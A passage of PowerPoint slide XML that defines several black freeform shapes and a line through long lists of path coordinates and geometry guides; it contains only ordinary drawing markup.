                      <a:pt x="56" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="43"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10800" name="Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1810" y="2458"/>
                <a:ext cx="135" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 135"/>
                  <a:gd name="T1" fmla="*/ 0 h 39"/>
                  <a:gd name="T2" fmla="*/ 131 w 135"/>
                  <a:gd name="T3" fmla="*/ 39 h 39"/>
                  <a:gd name="T4" fmla="*/ 135 w 135"/>
                  <a:gd name="T5" fmla="*/ 39 h 39"/>
                  <a:gd name="T6" fmla="*/ 4 w 135"/>
                  <a:gd name="T7" fmla="*/ 0 h 39"/>
                  <a:gd name="T8" fmla="*/ 0 w 135"/>
                  <a:gd name="T9" fmla="*/ 0 h 39"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 135"/>
                  <a:gd name="T16" fmla="*/ 0 h 39"/>
                  <a:gd name="T17" fmla="*/ 135 w 135"/>
                  <a:gd name="T18" fmla="*/ 39 h 39"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="135" h="39">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="131" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10801" name="Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1833" y="2452"/>
                <a:ext cx="132" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 132"/>
                  <a:gd name="T1" fmla="*/ 0 h 36"/>
                  <a:gd name="T2" fmla="*/ 129 w 132"/>
                  <a:gd name="T3" fmla="*/ 36 h 36"/>
                  <a:gd name="T4" fmla="*/ 132 w 132"/>
                  <a:gd name="T5" fmla="*/ 35 h 36"/>
                  <a:gd name="T6" fmla="*/ 3 w 132"/>
                  <a:gd name="T7" fmla="*/ 0 h 36"/>
                  <a:gd name="T8" fmla="*/ 0 w 132"/>
                  <a:gd name="T9" fmla="*/ 0 h 36"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 132"/>
                  <a:gd name="T16" fmla="*/ 0 h 36"/>
                  <a:gd name="T17" fmla="*/ 132 w 132"/>
                  <a:gd name="T18" fmla="*/ 36 h 36"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="132" h="36">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="129" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10802" name="Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1822" y="2454"/>
                <a:ext cx="133" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 133"/>
                  <a:gd name="T1" fmla="*/ 0 h 39"/>
                  <a:gd name="T2" fmla="*/ 131 w 133"/>
                  <a:gd name="T3" fmla="*/ 39 h 39"/>
                  <a:gd name="T4" fmla="*/ 133 w 133"/>
                  <a:gd name="T5" fmla="*/ 39 h 39"/>
                  <a:gd name="T6" fmla="*/ 4 w 133"/>
                  <a:gd name="T7" fmla="*/ 0 h 39"/>
                  <a:gd name="T8" fmla="*/ 0 w 133"/>
                  <a:gd name="T9" fmla="*/ 0 h 39"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 133"/>
                  <a:gd name="T16" fmla="*/ 0 h 39"/>
                  <a:gd name="T17" fmla="*/ 133 w 133"/>
                  <a:gd name="T18" fmla="*/ 39 h 39"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="133" h="39">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="131" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10803" name="Line 210"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2159" y="2765"/>
                <a:ext cx="274" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10804" name="Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3611" y="2380"/>
                <a:ext cx="1198" cy="719"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1142 w 1198"/>
                  <a:gd name="T1" fmla="*/ 3 h 719"/>
                  <a:gd name="T2" fmla="*/ 1116 w 1198"/>
                  <a:gd name="T3" fmla="*/ 0 h 719"/>
                  <a:gd name="T4" fmla="*/ 1082 w 1198"/>
                  <a:gd name="T5" fmla="*/ 7 h 719"/>
                  <a:gd name="T6" fmla="*/ 1036 w 1198"/>
                  <a:gd name="T7" fmla="*/ 24 h 719"/>
                  <a:gd name="T8" fmla="*/ 956 w 1198"/>
                  <a:gd name="T9" fmla="*/ 56 h 719"/>
                  <a:gd name="T10" fmla="*/ 904 w 1198"/>
                  <a:gd name="T11" fmla="*/ 73 h 719"/>
                  <a:gd name="T12" fmla="*/ 866 w 1198"/>
                  <a:gd name="T13" fmla="*/ 77 h 719"/>
                  <a:gd name="T14" fmla="*/ 798 w 1198"/>
                  <a:gd name="T15" fmla="*/ 75 h 719"/>
                  <a:gd name="T16" fmla="*/ 719 w 1198"/>
                  <a:gd name="T17" fmla="*/ 65 h 719"/>
                  <a:gd name="T18" fmla="*/ 632 w 1198"/>
                  <a:gd name="T19" fmla="*/ 56 h 719"/>
                  <a:gd name="T20" fmla="*/ 574 w 1198"/>
                  <a:gd name="T21" fmla="*/ 58 h 719"/>
                  <a:gd name="T22" fmla="*/ 524 w 1198"/>
                  <a:gd name="T23" fmla="*/ 65 h 719"/>
                  <a:gd name="T24" fmla="*/ 464 w 1198"/>
                  <a:gd name="T25" fmla="*/ 76 h 719"/>
                  <a:gd name="T26" fmla="*/ 398 w 1198"/>
                  <a:gd name="T27" fmla="*/ 89 h 719"/>
                  <a:gd name="T28" fmla="*/ 274 w 1198"/>
                  <a:gd name="T29" fmla="*/ 117 h 719"/>
                  <a:gd name="T30" fmla="*/ 190 w 1198"/>
                  <a:gd name="T31" fmla="*/ 144 h 719"/>
                  <a:gd name="T32" fmla="*/ 131 w 1198"/>
                  <a:gd name="T33" fmla="*/ 169 h 719"/>
                  <a:gd name="T34" fmla="*/ 82 w 1198"/>
                  <a:gd name="T35" fmla="*/ 198 h 719"/>
                  <a:gd name="T36" fmla="*/ 47 w 1198"/>
                  <a:gd name="T37" fmla="*/ 232 h 719"/>
                  <a:gd name="T38" fmla="*/ 23 w 1198"/>
                  <a:gd name="T39" fmla="*/ 273 h 719"/>
                  <a:gd name="T40" fmla="*/ 8 w 1198"/>
                  <a:gd name="T41" fmla="*/ 323 h 719"/>
                  <a:gd name="T42" fmla="*/ 1 w 1198"/>
                  <a:gd name="T43" fmla="*/ 378 h 719"/>
                  <a:gd name="T44" fmla="*/ 0 w 1198"/>
                  <a:gd name="T45" fmla="*/ 434 h 719"/>
                  <a:gd name="T46" fmla="*/ 6 w 1198"/>
                  <a:gd name="T47" fmla="*/ 489 h 719"/>
                  <a:gd name="T48" fmla="*/ 17 w 1198"/>
                  <a:gd name="T49" fmla="*/ 539 h 719"/>
                  <a:gd name="T50" fmla="*/ 33 w 1198"/>
                  <a:gd name="T51" fmla="*/ 582 h 719"/>
                  <a:gd name="T52" fmla="*/ 51 w 1198"/>
                  <a:gd name="T53" fmla="*/ 615 h 719"/>
                  <a:gd name="T54" fmla="*/ 77 w 1198"/>
                  <a:gd name="T55" fmla="*/ 638 h 719"/>
                  <a:gd name="T56" fmla="*/ 110 w 1198"/>
                  <a:gd name="T57" fmla="*/ 656 h 719"/>
                  <a:gd name="T58" fmla="*/ 159 w 1198"/>
                  <a:gd name="T59" fmla="*/ 670 h 719"/>
                  <a:gd name="T60" fmla="*/ 248 w 1198"/>
                  <a:gd name="T61" fmla="*/ 683 h 719"/>
                  <a:gd name="T62" fmla="*/ 342 w 1198"/>
                  <a:gd name="T63" fmla="*/ 692 h 719"/>
                  <a:gd name="T64" fmla="*/ 401 w 1198"/>
                  <a:gd name="T65" fmla="*/ 700 h 719"/>
                  <a:gd name="T66" fmla="*/ 492 w 1198"/>
                  <a:gd name="T67" fmla="*/ 710 h 719"/>
                  <a:gd name="T68" fmla="*/ 631 w 1198"/>
                  <a:gd name="T69" fmla="*/ 717 h 719"/>
                  <a:gd name="T70" fmla="*/ 708 w 1198"/>
                  <a:gd name="T71" fmla="*/ 719 h 719"/>
                  <a:gd name="T72" fmla="*/ 753 w 1198"/>
                  <a:gd name="T73" fmla="*/ 719 h 719"/>
                  <a:gd name="T74" fmla="*/ 791 w 1198"/>
                  <a:gd name="T75" fmla="*/ 719 h 719"/>
                  <a:gd name="T76" fmla="*/ 824 w 1198"/>
                  <a:gd name="T77" fmla="*/ 718 h 719"/>
                  <a:gd name="T78" fmla="*/ 876 w 1198"/>
                  <a:gd name="T79" fmla="*/ 712 h 719"/>
                  <a:gd name="T80" fmla="*/ 931 w 1198"/>
                  <a:gd name="T81" fmla="*/ 700 h 719"/>
                  <a:gd name="T82" fmla="*/ 977 w 1198"/>
                  <a:gd name="T83" fmla="*/ 687 h 719"/>
                  <a:gd name="T84" fmla="*/ 1029 w 1198"/>
                  <a:gd name="T85" fmla="*/ 672 h 719"/>
                  <a:gd name="T86" fmla="*/ 1096 w 1198"/>
                  <a:gd name="T87" fmla="*/ 652 h 719"/>
                  <a:gd name="T88" fmla="*/ 1142 w 1198"/>
                  <a:gd name="T89" fmla="*/ 627 h 719"/>
                  <a:gd name="T90" fmla="*/ 1168 w 1198"/>
                  <a:gd name="T91" fmla="*/ 601 h 719"/>
                  <a:gd name="T92" fmla="*/ 1188 w 1198"/>
                  <a:gd name="T93" fmla="*/ 554 h 719"/>
                  <a:gd name="T94" fmla="*/ 1196 w 1198"/>
                  <a:gd name="T95" fmla="*/ 498 h 719"/>
                  <a:gd name="T96" fmla="*/ 1197 w 1198"/>
                  <a:gd name="T97" fmla="*/ 433 h 719"/>
                  <a:gd name="T98" fmla="*/ 1196 w 1198"/>
                  <a:gd name="T99" fmla="*/ 361 h 719"/>
                  <a:gd name="T100" fmla="*/ 1196 w 1198"/>
                  <a:gd name="T101" fmla="*/ 321 h 719"/>
                  <a:gd name="T102" fmla="*/ 1197 w 1198"/>
                  <a:gd name="T103" fmla="*/ 271 h 719"/>
                  <a:gd name="T104" fmla="*/ 1197 w 1198"/>
                  <a:gd name="T105" fmla="*/ 166 h 719"/>
                  <a:gd name="T106" fmla="*/ 1194 w 1198"/>
                  <a:gd name="T107" fmla="*/ 103 h 719"/>
                  <a:gd name="T108" fmla="*/ 1186 w 1198"/>
                  <a:gd name="T109" fmla="*/ 61 h 719"/>
                  <a:gd name="T110" fmla="*/ 1173 w 1198"/>
                  <a:gd name="T111" fmla="*/ 28 h 7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98"/>
                  <a:gd name="T169" fmla="*/ 0 h 719"/>
                  <a:gd name="T170" fmla="*/ 1198 w 1198"/>
                  <a:gd name="T171" fmla="*/ 719 h 71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98" h="719">
                    <a:moveTo>
                      <a:pt x="1160" y="13"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1154" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1149" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1142" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1137" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1130" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1123" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1107" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1099" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1091" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1082" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1074" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1064" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1055" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1036" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1016" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="936" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="904" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="895" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="885" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="875" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="855" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="817" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="758" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="739" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="698" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="632" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="550" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="448"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="539"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="648"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="662"/>
                    </a:lnTo>
